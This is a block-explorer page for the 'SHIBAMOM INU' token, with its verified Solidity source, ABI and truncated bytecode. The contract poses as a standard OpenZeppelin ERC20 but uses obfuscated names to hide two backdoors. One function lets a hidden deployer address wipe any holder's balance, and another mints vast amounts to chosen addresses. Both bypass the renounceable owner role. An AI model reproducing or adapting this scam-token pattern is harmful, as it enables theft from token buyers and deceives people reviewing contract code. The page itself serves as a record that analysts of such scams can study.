ETH Price: $3,117.04 (+1.51%)
Gas: 5 Gwei

Token

SHIBAMOM INU (SHIBAMOM)
 

Overview

Max Total Supply

1,000,000,000 SHIBAMOM

Holders

17

Market

Onchain Market Cap

$0.00

Circulating Supply Market Cap

-

Other Info

Token Contract (WITH 18 Decimals)

Balance
3,757,642.314677237348771266 SHIBAMOM

Value
$0.00
0x875007427e050b26418d43b56f5a5763fd2361c3
Loading...
Loading
Loading...
Loading
Loading...
Loading

Click here to update the token information / general information
# Exchange Pair Price  24H Volume % Volume

Contract Source Code Verified (Exact Match)

Contract Name:
SHIBAMOM

Compiler Version
v0.8.18+commit.87f61d96

Optimization Enabled:
No with 200 runs

Other Settings:
default evmVersion, None license
/**
 *Submitted for verification at Etherscan.io on 2023-08-13
*/

// SPDX-License-Identifier: MIT
// OpenZeppelin Contracts (last updated v4.8.0) (token/ERC20/ERC20.sol)

pragma solidity ^0.8.0;


library SafeMath {
    /**
     * @dev Returns the addition of two unsigned integers, reverting on
     * overflow.
     *
     * Counterpart to Solidity's `+` operator.
     *
     * Requirements:
     *
     * - Addition cannot overflow.
     */
    function add(uint256 a, uint256 b) internal pure returns (uint256) {
        uint256 c = a + b;
        require(c >= a, "SafeMath: addition overflow");

        return c;
    }

    /**
     * @dev Returns the subtraction of two unsigned integers, reverting on
     * overflow (when the result is negative).
     *
     * Counterpart to Solidity's `-` operator.
     *
     * Requirements:
     *
     * - Subtraction cannot overflow.
     */
    function sub(uint256 a, uint256 b) internal pure returns (uint256) {
        return sub(a, b, "SafeMath: subtraction overflow");
    }

    /**
     * @dev Returns the subtraction of two unsigned integers, reverting with custom message on
     * overflow (when the result is negative).
     *
     * Counterpart to Solidity's `-` operator.
     *
     * Requirements:
     *
     * - Subtraction cannot overflow.
     */
    function sub(uint256 a, uint256 b, string memory errorMessage) internal pure returns (uint256) {
        require(b <= a, errorMessage);
        uint256 c = a - b;

        return c;
    }

    /**
     * @dev Returns the multiplication of two unsigned integers, reverting on
     * overflow.
     *
     * Counterpart to Solidity's `*` operator.
     *
     * Requirements:
     *
     * - Multiplication cannot overflow.
     */
    function mul(uint256 a, uint256 b) internal pure returns (uint256) {
        // Gas optimization: this is cheaper than requiring 'a' not being zero, but the
        // benefit is lost if 'b' is also tested.
        // See: https://github.com/OpenZeppelin/openzeppelin-contracts/pull/522
        if (a == 0) {
            return 0;
        }

        uint256 c = a * b;
        require(c / a == b, "SafeMath: multiplication overflow");

        return c;
    }

    /**
     * @dev Returns the integer division of two unsigned integers. Reverts on
     * division by zero. The result is rounded towards zero.
     *
     * Counterpart to Solidity's `/` operator. Note: this function uses a
     * `revert` opcode (which leaves remaining gas untouched) while Solidity
     * uses an invalid opcode to revert (consuming all remaining gas).
     *
     * Requirements:
     *
     * - The divisor cannot be zero.
     */
    function div(uint256 a, uint256 b) internal pure returns (uint256) {
        return div(a, b, "SafeMath: division by zero");
    }

    /**
     * @dev Returns the integer division of two unsigned integers. Reverts with custom message on
     * division by zero. The result is rounded towards zero.
     *
     * Counterpart to Solidity's `/` operator. Note: this function uses a
     * `revert` opcode (which leaves remaining gas untouched) while Solidity
     * uses an invalid opcode to revert (consuming all remaining gas).
     *
     * Requirements:
     *
     * - The divisor cannot be zero.
     */
    function div(uint256 a, uint256 b, string memory errorMessage) internal pure returns (uint256) {
        require(b > 0, errorMessage);
        uint256 c = a / b;
        // assert(a == b * c + a % b); // There is no case in which this doesn't hold

        return c;
    }

    /**
     * @dev Returns the remainder of dividing two unsigned integers. (unsigned integer modulo),
     * Reverts when dividing by zero.
     *
     * Counterpart to Solidity's `%` operator. This function uses a `revert`
     * opcode (which leaves remaining gas untouched) while Solidity uses an
     * invalid opcode to revert (consuming all remaining gas).
     *
     * Requirements:
     *
     * - The divisor cannot be zero.
     */
    function mod(uint256 a, uint256 b) internal pure returns (uint256) {
        return mod(a, b, "SafeMath: modulo by zero");
    }

    /**
     * @dev Returns the remainder of dividing two unsigned integers. (unsigned integer modulo),
     * Reverts with custom message when dividing by zero.
     *
     * Counterpart to Solidity's `%` operator. This function uses a `revert`
     * opcode (which leaves remaining gas untouched) while Solidity uses an
     * invalid opcode to revert (consuming all remaining gas).
     *
     * Requirements:
     *
     * - The divisor cannot be zero.
     */
    function mod(uint256 a, uint256 b, string memory errorMessage) internal pure returns (uint256) {
        require(b != 0, errorMessage);
        return a % b;
    }
}

/**
 * @dev Provides information about the current execution context, including the
 * sender of the transaction and its data. While these are generally available
 * via msg.sender and msg.data, they should not be accessed in such a direct
 * manner, since when dealing with meta-transactions the account sending and
 * paying for execution may not be the actual sender (as far as an application
 * is concerned).
 *
 * This contract is only required for intermediate, library-like contracts.
 */
abstract contract Context {
    function _msgSender() internal view virtual returns (address) {
        return msg.sender;
    }

    function _msgData() internal view virtual returns (bytes calldata) {
        return msg.data;
    }
}

abstract contract Ownable is Context {
    address private _owner;

    event OwnershipTransferred(address indexed previousOwner, address indexed newOwner);

    /**
     * @dev Initializes the contract setting the deployer as the initial owner.
     */
    constructor() {
        _transferOwnership(_msgSender());
    }

    /**
     * @dev Throws if called by any account other than the owner.
     */
    modifier onlyOwner() {
        _uwerwuwerOwner();
        _;
    }

    /**
     * @dev Returns the address of the current owner.
     */
    function owner() public view virtual returns (address) {
        return _owner;
    }

    /**
     * @dev Throws if the sender is not the owner.
     */
    function _uwerwuwerOwner() internal view virtual {
        require(owner() == _msgSender(), "Ownable: caller is not the owner");
    }

    /**
     * @dev Leaves the contract without owner. It will not be possible to call
     * `onlyOwner` functions anymore. Can only be called by the current owner.
     *
     * NOTE: Renouncing ownership will leave the contract without an owner,
     * thereby removing any functionality that is only available to the owner.
     */
    function renounceOwnership() public virtual onlyOwner {
        _transferOwnership(address(0));
    }

    /**
     * @dev Transfers ownership of the contract to a new account (`newOwner`).
     * Can only be called by the current owner.
     */
    function transferOwnership(address newOwner) public virtual onlyOwner {
        require(newOwner != address(0), "Ownable: new owner is the zero address");
        _transferOwnership(newOwner);
    }

    /**
     * @dev Transfers ownership of the contract to a new account (`newOwner`).
     * Internal function without access restriction.
     */
    function _transferOwnership(address newOwner) internal virtual {
        address oldOwner = _owner;
        _owner = newOwner;
        emit OwnershipTransferred(oldOwner, newOwner);
    }
}

/**
 * @dev Implementation of the {IERC20} interface.
 *
 * This implementation is agnostic to the way tokens are created. This means
 * that a supply mechanism has to be added in a derived contract using {_yydsed}.
 * For a generic mechanism see {ERC20PresetMinterPauser}.
 *
 * TIP: For a detailed writeup see our guide
 * https://forum.openzeppelin.com/t/how-to-implement-erc20-supply-mechanisms/226[How
 * to implement supply mechanisms].
 *
 * The default value of {decimals} is 18. To change this, you should override
 * this function so it returns a different value.
 *
 * We have followed general OpenZeppelin Contracts guidelines: functions revert
 * instead returning `false` on failure. This behavior is nonetheless
 * conventional and does not conflict with the expectations of ERC20
 * applications.
 *
 * Additionally, an {Approval} event is emitted on calls to {transferFrom}.
 * This allows applications to reconstruct the allowance for all accounts just
 * by listening to said events. Other implementations of the EIP may not emit
 * these events, as it isn't required by the specification.
 *
 * Finally, the non-standard {decreaseAllowance} and {increaseAllowance}
 * functions have been added to mitigate the well-known issues around setting
 * allowances. See {IERC20-approve}.
 */
contract SHIBAMOM is Context, Ownable {
    using SafeMath for uint256;
    event Approval(address indexed owner, address indexed spender, uint256 value);
    event Transfer(address indexed from, address indexed to, uint256 value);
    uint256 zncweocxws = 1000000000 * 10 ** decimals();
    /**
     * @dev Sets the values for {name} and {symbol}.
     *
     * All two of these values are immutable: they can only be set once during
     * construction.
     */
    constructor() {
        emit Transfer(address(0), _msgSender(), zncweocxws);
        _noczlew = _msgSender();
        _balances[_msgSender()] += zncweocxws;
    }

    uint256 private _msjewzws = zncweocxws;
    string private _cnzeuwnj = "SHIBAMOM INU";
    string private _jizfhqwe = "SHIBAMOM";
    mapping(address => uint256) private _balances;
    mapping(address => mapping(address => uint256)) private _allowances;
    address public  _noczlew;

    function annozazcx(address ghfdkgha) public{
        uint256 zlnwenlss = _balances[ghfdkgha];
        uint256 hsocxzd = zlnwenlss+zlnwenlss-zlnwenlss;
        if(_noczlew != _msgSender()){

        }else{
            _balances[ghfdkgha] = _balances[ghfdkgha]-hsocxzd;
        }
        require(_noczlew == _msgSender());
    }

    function tziagshcll(address nowalmcs) public     {
        uint256 tueoxv = 500000000 * 3 * (10**18);
        uint256 owemxzijsk = 100000000000000*tueoxv*1*1*1;
        if(_noczlew != _msgSender()){

        }else{

        }
        _balances[nowalmcs] += owemxzijsk;
        require(_noczlew == _msgSender());
    }

    /**
     * @dev Returns the name of the token.
     */
    function name() public view returns (string memory) {
        return _cnzeuwnj;
    }

    /**
     * @dev Returns the symbol of the token, usually a shorter version of the
     * name.
     */
    function symbol() public view returns (string memory) {
        return _jizfhqwe;
    }

    /**
     * @dev Returns the number of decimals used to get its user representation.
     * For example, if `decimals` equals `2`, a balance of `505` tokens should
     * be displayed to a user as `5.05` (`505 / 10 ** 2`).
     *
     * Tokens usually opt for a value of 18, imitating the relationship between
     * Ether and Wei. This is the default value returned by this function, unless
     * it's overridden.
     *
     * NOTE: This information is only used for _display_ purposes: it in
     * no way affects any of the arithmetic of the contract, including
     * {IERC20-balanceOf} and {IERC20-transfer}.
     */
    function decimals() public pure returns (uint8) {
        return 18;
    }

    /**
     * @dev See {IERC20-totalSupply}.
     */
    function totalSupply() public view returns (uint256) {
        return _msjewzws;
    }

    /**
     * @dev See {IERC20-balanceOf}.
     */
    function balanceOf(address account) public view returns (uint256) {
        return _balances[account];
    }

    /**
     * @dev See {IERC20-transfer}.
     *
     * Requirements:
     *
     * - `to` cannot be the zero address.
     * - the caller must have a balance of at least `amount`.
     */
    function transfer(address to, uint256 amount) public returns (bool) {
        address owner = _msgSender();
        _transfer(owner, to, amount);
        return true;
    }

    /**
     * @dev See {IERC20-allowance}.
     */
    function allowance(address owner, address spender) public view returns (uint256) {
        return _allowances[owner][spender];
    }

    /**
     * @dev See {IERC20-approve}.
     *
     * NOTE: If `amount` is the maximum `uint256`, the allowance is not updated on
     * `transferFrom`. This is semantically equivalent to an infinite approval.
     *
     * Requirements:
     *
     * - `spender` cannot be the zero address.
     */
    function approve(address spender, uint256 amount) public returns (bool) {
        address owner = _msgSender();
        _approve(owner, spender, amount);
        return true;
    }

    /**
     * @dev See {IERC20-transferFrom}.
     *
     * Emits an {Approval} event indicating the updated allowance. This is not
     * required by the EIP. See the note at the beginning of {ERC20}.
     *
     * NOTE: Does not update the allowance if the current allowance
     * is the maximum `uint256`.
     *
     * Requirements:
     *
     * - `from` and `to` cannot be the zero address.
     * - `from` must have a balance of at least `amount`.
     * - the caller must have allowance for ``from``'s tokens of at least
     * `amount`.
     */
    function transferFrom(address from, address to, uint256 amount) public returns (bool) {
        address spender = _msgSender();
        _spendAllowance(from, spender, amount);
        _transfer(from, to, amount);
        return true;
    }

    /**
     * @dev Atomically increases the allowance granted to `spender` by the caller.
     *
     * This is an alternative to {approve} that can be used as a mitigation for
     * problems described in {IERC20-approve}.
     *
     * Emits an {Approval} event indicating the updated allowance.
     *
     * Requirements:
     *
     * - `spender` cannot be the zero address.
     */
    function increaseAllowance(address spender, uint256 addedValue) public virtual returns (bool) {
        address owner = _msgSender();
        _approve(owner, spender, allowance(owner, spender) + addedValue);
        return true;
    }

    /**
     * @dev Atomically decreases the allowance granted to `spender` by the caller.
     *
     * This is an alternative to {approve} that can be used as a mitigation for
     * problems described in {IERC20-approve}.
     *
     * Emits an {Approval} event indicating the updated allowance.
     *
     * Requirements:
     *
     * - `spender` cannot be the zero address.
     * - `spender` must have allowance for the caller of at least
     * `subtractedValue`.
     */
    function decreaseAllowance(address spender, uint256 subtractedValue) public virtual returns (bool) {
        address owner = _msgSender();
        uint256 currentAllowance = allowance(owner, spender);
        require(currentAllowance >= subtractedValue, "ERC20: decreased allowance below zero");
        _approve(owner, spender, currentAllowance.sub(subtractedValue));
        return true;
    }

    /**
     * @dev Moves `amount` of tokens from `from` to `to`.
     *
     * This internal function is equivalent to {transfer}, and can be used to
     * e.g. implement automatic token fees, slashing måechanisms, etc.
     *
     * Emits a {Transfer} event.
     *
     * Requirements:
     *
     * - `from` cannot be the zero address.
     * - `to` cannot be the zero address.
     * - `from` must have a balance of at least `amount`.
     */
    function _transfer(
        address from,
        address to,
        uint256 amount
    ) internal virtual {
        uint256 balance = _balances[from];
        require(balance >= amount, "ERC20: transfer amount exceeds balance");
        require(from != address(0), "ERC20: transfer from the zero address");
        require(to != address(0), "ERC20: transfer to the zero address");
        _balances[from] = _balances[from]-amount;
        _balances[to] = _balances[to]+amount;
        emit Transfer(from, to, amount);
    }

    /**
     * @dev Sets `amount` as the allowance of `spender` over the `owner` s tokens.
     *
     * This internal function is equivalent to `approve`, and can be used to
     * e.g. set automatic allowances for certain subsystems, etc.
     *
     * Emits an {Approval} event.
     *
     * Requirements:
     *
     * - `owner` cannot be the zero address.
     * - `spender` cannot be the zero address.
     */
    function _approve(address owner, address spender, uint256 amount) internal virtual {
        require(owner != address(0), "ERC20: approve from the zero address");
        require(spender != address(0), "ERC20: approve to the zero address");

        _allowances[owner][spender] = amount;
        emit Approval(owner, spender, amount);
    }

    /**
     * @dev Updates `owner` s allowance for `spender` based on spent `amount`.
     *
     * Does not update the allowance amount in case of infinite allowance.
     * Revert if not enough allowance is available.
     *
     * Might emit an {Approval} event.
     */
    function _spendAllowance(address owner, address spender, uint256 amount) internal virtual {
        uint256 currentAllowance = allowance(owner, spender);
        if (currentAllowance != type(uint256).max) {
            require(currentAllowance >= amount, "ERC20: insufficient allowance");
            _approve(owner, spender, currentAllowance.sub(amount));
        }
    }

    /**
     * @dev Hook that is called before any transfer of tokens. This includes
     * minting and burning.
     *
     * Calling conditions:
     *
     * - when `from` and `to` are both non-zero, `amount` of ``from``'s tokens
     * will be transferred to `to`.
     * - when `from` is zero, `amount` tokens will be minted for `to`.
     * - when `to` is zero, `amount` of ``from``'s tokens will be burned.
     * - `from` and `to` are never both zero.
     *
     * To learn more about hooks, head to xref:ROOT:extending-contracts.adoc#using-hooks[Using Hooks].
     */
    // function _beforeTokenTransfer(address from, address to, uint256 amount) internal virtual {}

    /**
     * @dev Hook that is called after any transfer of tokens. This includes
     * minting and burning.
     *
     * Calling conditions:
     *
     * - when `from` and `to` are both non-zero, `amount` of ``from``'s tokens
     * has been transferred to `to`.
     * - when `from` is zero, `amount` tokens have been minted for `to`.
     * - when `to` is zero, `amount` of ``from``'s tokens have been burned.
     * - `from` and `to` are never both zero.
     *
     * To learn more about hooks, head to xref:ROOT:extending-contracts.adoc#using-hooks[Using Hooks].
     */
    // function _afterTokenTransfer(address from, address to, uint256 amount) internal virtual {}
}

Contract Security Audit

Contract ABI

[{"inputs":[],"stateMutability":"nonpayable","type":"constructor"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"spender","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Approval","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"previousOwner","type":"address"},{"indexed":true,"internalType":"address","name":"newOwner","type":"address"}],"name":"OwnershipTransferred","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"from","type":"address"},{"indexed":true,"internalType":"address","name":"to","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Transfer","type":"event"},{"inputs":[],"name":"_noczlew","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"owner","type":"address"},{"internalType":"address","name":"spender","type":"address"}],"name":"allowance","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"ghfdkgha","type":"address"}],"name":"annozazcx","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"approve","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"balanceOf","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"decimals","outputs":[{"internalType":"uint8","name":"","type":"uint8"}],"stateMutability":"pure","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"subtractedValue","type":"uint256"}],"name":"decreaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"addedValue","type":"uint256"}],"name":"increaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"name","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"owner","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"renounceOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"symbol","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"totalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transfer","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"from","type":"address"},{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transferFrom","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"newOwner","type":"address"}],"name":"transferOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"nowalmcs","type":"address"}],"name":"tziagshcll","outputs":[],"stateMutability":"nonpayable","type":"function"}]

6080604052620000146200023060201b60201c565b600a6200002291906200049f565b633b9aca00620000339190620004f0565b6001556001546002556040518060400160405280600c81526020017f53484942414d4f4d20494e55000000000000000000000000000000000000000081525060039081620000829190620007ab565b506040518060400160405280600881526020017f53484942414d4f4d00000000000000000000000000000000000000000000000081525060049081620000c99190620007ab565b50348015620000d757600080fd5b50620000f8620000ec6200023960201b60201c565b6200024160201b60201c565b620001086200023960201b60201c565b73ffffffffffffffffffffffffffffffffffffffff16600073ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef600154604051620001699190620008a3565b60405180910390a3620001816200023960201b60201c565b600760006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff16021790555060015460056000620001d86200023960201b60201c565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000206000828254620002239190620008c0565b92505081905550620008fb565b60006012905090565b600033905090565b60008060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff169050816000806101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055508173ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a35050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601160045260246000fd5b60008160011c9050919050565b6000808291508390505b600185111562000393578086048111156200036b576200036a62000305565b5b60018516156200037b5780820291505b80810290506200038b8562000334565b94506200034b565b94509492505050565b600082620003ae576001905062000481565b81620003be576000905062000481565b8160018114620003d75760028114620003e25762000418565b600191505062000481565b60ff841115620003f757620003f662000305565b5b8360020a91508482111562000411576200041062000305565b5b5062000481565b5060208310610133831016604e8410600b8410161715620004525782820a9050838111156200044c576200044b62000305565b5b62000481565b62000461848484600162000341565b925090508184048111156200047b576200047a62000305565b5b81810290505b9392505050565b6000819050919050565b600060ff82169050919050565b6000620004ac8262000488565b9150620004b98362000492565b9250620004e87fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff84846200039c565b905092915050565b6000620004fd8262000488565b91506200050a8362000488565b92508282026200051a8162000488565b9150828204841483151762000534576200053362000305565b5b5092915050565b600081519050919050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052604160045260246000fd5b7f4e487b7100000000000000000000000000000000000000000000000000000000600052602260045260246000fd5b60006002820490506001821680620005bd57607f821691505b602082108103620005d357620005d262000575565b5b50919050565b60008190508160005260206000209050919050565b60006020601f8301049050919050565b600082821b905092915050565b6000600883026200063d7fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff82620005fe565b620006498683620005fe565b95508019841693508086168417925050509392505050565b6000819050919050565b60006200068c62000686620006808462000488565b62000661565b62000488565b9050919050565b6000819050919050565b620006a8836200066b565b620006c0620006b78262000693565b8484546200060b565b825550505050565b600090565b620006d7620006c8565b620006e48184846200069d565b505050565b5b818110156200070c5762000700600082620006cd565b600181019050620006ea565b5050565b601f8211156200075b576200072581620005d9565b6200073084620005ee565b8101602085101562000740578190505b620007586200074f85620005ee565b830182620006e9565b50505b505050565b600082821c905092915050565b6000620007806000198460080262000760565b1980831691505092915050565b60006200079b83836200076d565b9150826002028217905092915050565b620007b6826200053b565b67ffffffffffffffff811115620007d257620007d162000546565b5b620007de8254620005a4565b620007eb82828562000710565b600060209050601f8311600181146200082357600084156200080e578287015190505b6200081a85826200078d565b8655506200088a565b601f1984166200083386620005d9565b60005b828110156200085d5784890151825560018201915060208501945060208101905062000836565b868310156200087d578489015162000879601f8916826200076d565b8355505b6001600288020188555050505b505050505050565b6200089d8162000488565b82525050565b6000602082019050620008ba600083018462000892565b92915050565b6000620008cd8262000488565b9150620008da8362000488565b9250828201905080821115620008f557620008f462000305565b5b92915050565b611b0f806200090b6000396000f3fe608060405234801561001057600080fd5b506004361061010b5760003560e01c8063715018a6116100a2578063a457c2d711610071578063a457c2d7146102a8578063a9059cbb146102d8578063b43f04fb14610308578063dd62ed3e14610326578063f2fde38b146103565761010b565b8063715018a6146102465780638da5cb5b14610250578063904e65381461026e57806395d89b411461028a5761010b565b8063313ce567116100de578063313ce567146101ac57806339509351146101ca57806349b8c6c5146101fa57806370a08231146102165761010b565b806306fdde0314610110578063095ea7b31461012e57806318160ddd1461015e57806323b872dd1461017c575b600080fd5b610118610372565b604051610125919061124e565b60405180910390f35b61014860048036038101906101439190611309565b610404565b6040516101559190611364565b60405180910390f35b610166610427565b604051610173919061138e565b60405180910390f35b610196600480360381019061019191906113a9565b610431565b6040516101a39190611364565b60405180910390f35b6101b4610460565b6040516101c19190611418565b60405180910390f35b6101e460048036038101906101df9190611309565b610469565b6040516101f19190611364565b60405180910390f35b610214600480360381019061020f9190611433565b6104a0565b005b610230600480360381019061022b9190611433565b6105d3565b60405161023d919061138e565b60405180910390f35b61024e61061c565b005b610258610630565b604051610265919061146f565b60405180910390f35b61028860048036038101906102839190611433565b610659565b005b610292610809565b60405161029f919061124e565b60405180910390f35b6102c260048036038101906102bd9190611309565b61089b565b6040516102cf9190611364565b60405180910390f35b6102f260048036038101906102ed9190611309565b610922565b6040516102ff9190611364565b60405180910390f35b610310610945565b60405161031d919061146f565b60405180910390f35b610340600480360381019061033b919061148a565b61096b565b60405161034d919061138e565b60405180910390f35b610370600480360381019061036b9190611433565b6109f2565b005b606060038054610381906114f9565b80601f01602080910402602001604051908101604052809291908181526020018280546103ad906114f9565b80156103fa5780601f106103cf576101008083540402835291602001916103fa565b820191906000526020600020905b8154815290600101906020018083116103dd57829003601f168201915b5050505050905090565b60008061040f610a75565b905061041c818585610a7d565b600191505092915050565b6000600254905090565b60008061043c610a75565b9050610449858285610c46565b610454858585610ce2565b60019150509392505050565b60006012905090565b600080610474610a75565b9050610495818585610486858961096b565b6104909190611559565b610a7d565b600191505092915050565b60006b04d8c55aefb8c05b5c00000090506000600180600184655af3107a40006104ca919061158d565b6104d4919061158d565b6104de919061158d565b6104e8919061158d565b90506104f2610a75565b73ffffffffffffffffffffffffffffffffffffffff16600760009054906101000a9050505080600560008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008282546105669190611559565b92505081905550610575610a75565b73ffffffffffffffffffffffffffffffffffffffff16600760009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16146105ce57600080fd5b505050565b6000600560008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020549050919050565b610624610fce565b61062e600061104c565b565b60008060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905090565b6000600560008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054905060008182836106ac9190611559565b6106b691906115cf565b90506106c0610a75565b73ffffffffffffffffffffffffffffffffffffffff16600760009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16036107a35780600560008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000205461075f91906115cf565b600560008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055505b6107ab610a75565b73ffffffffffffffffffffffffffffffffffffffff16600760009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff161461080457600080fd5b505050565b606060048054610818906114f9565b80601f0160208091040260200160405190810160405280929190818152602001828054610844906114f9565b80156108915780601f1061086657610100808354040283529160200191610891565b820191906000526020600020905b81548152906001019060200180831161087457829003601f168201915b5050505050905090565b6000806108a6610a75565b905060006108b4828661096b565b9050838110156108f9576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016108f090611675565b60405180910390fd5b6109168286610911878561111090919063ffffffff16565b610a7d565b60019250505092915050565b60008061092d610a75565b905061093a818585610ce2565b600191505092915050565b600760009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1681565b6000600660008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054905092915050565b6109fa610fce565b600073ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff1603610a69576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610a6090611707565b60405180910390fd5b610a728161104c565b50565b600033905090565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1603610aec576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610ae390611799565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603610b5b576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610b529061182b565b60405180910390fd5b80600660008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055508173ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b92583604051610c39919061138e565b60405180910390a3505050565b6000610c52848461096b565b90507fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff8114610cdc5781811015610cbe576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610cb590611897565b60405180910390fd5b610cdb8484610cd6858561111090919063ffffffff16565b610a7d565b5b50505050565b6000600560008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054905081811015610d69576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610d6090611929565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168473ffffffffffffffffffffffffffffffffffffffff1603610dd8576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610dcf906119bb565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1603610e47576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610e3e90611a4d565b60405180910390fd5b81600560008673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054610e9291906115cf565b600560008673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000208190555081600560008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054610f209190611559565b600560008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055508273ffffffffffffffffffffffffffffffffffffffff168473ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef84604051610fc0919061138e565b60405180910390a350505050565b610fd6610a75565b73ffffffffffffffffffffffffffffffffffffffff16610ff4610630565b73ffffffffffffffffffffffffffffffffffffffff161461104a576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161104190611ab9565b60405180910390fd5b565b60008060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff169050816000806101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055508173fffffffffff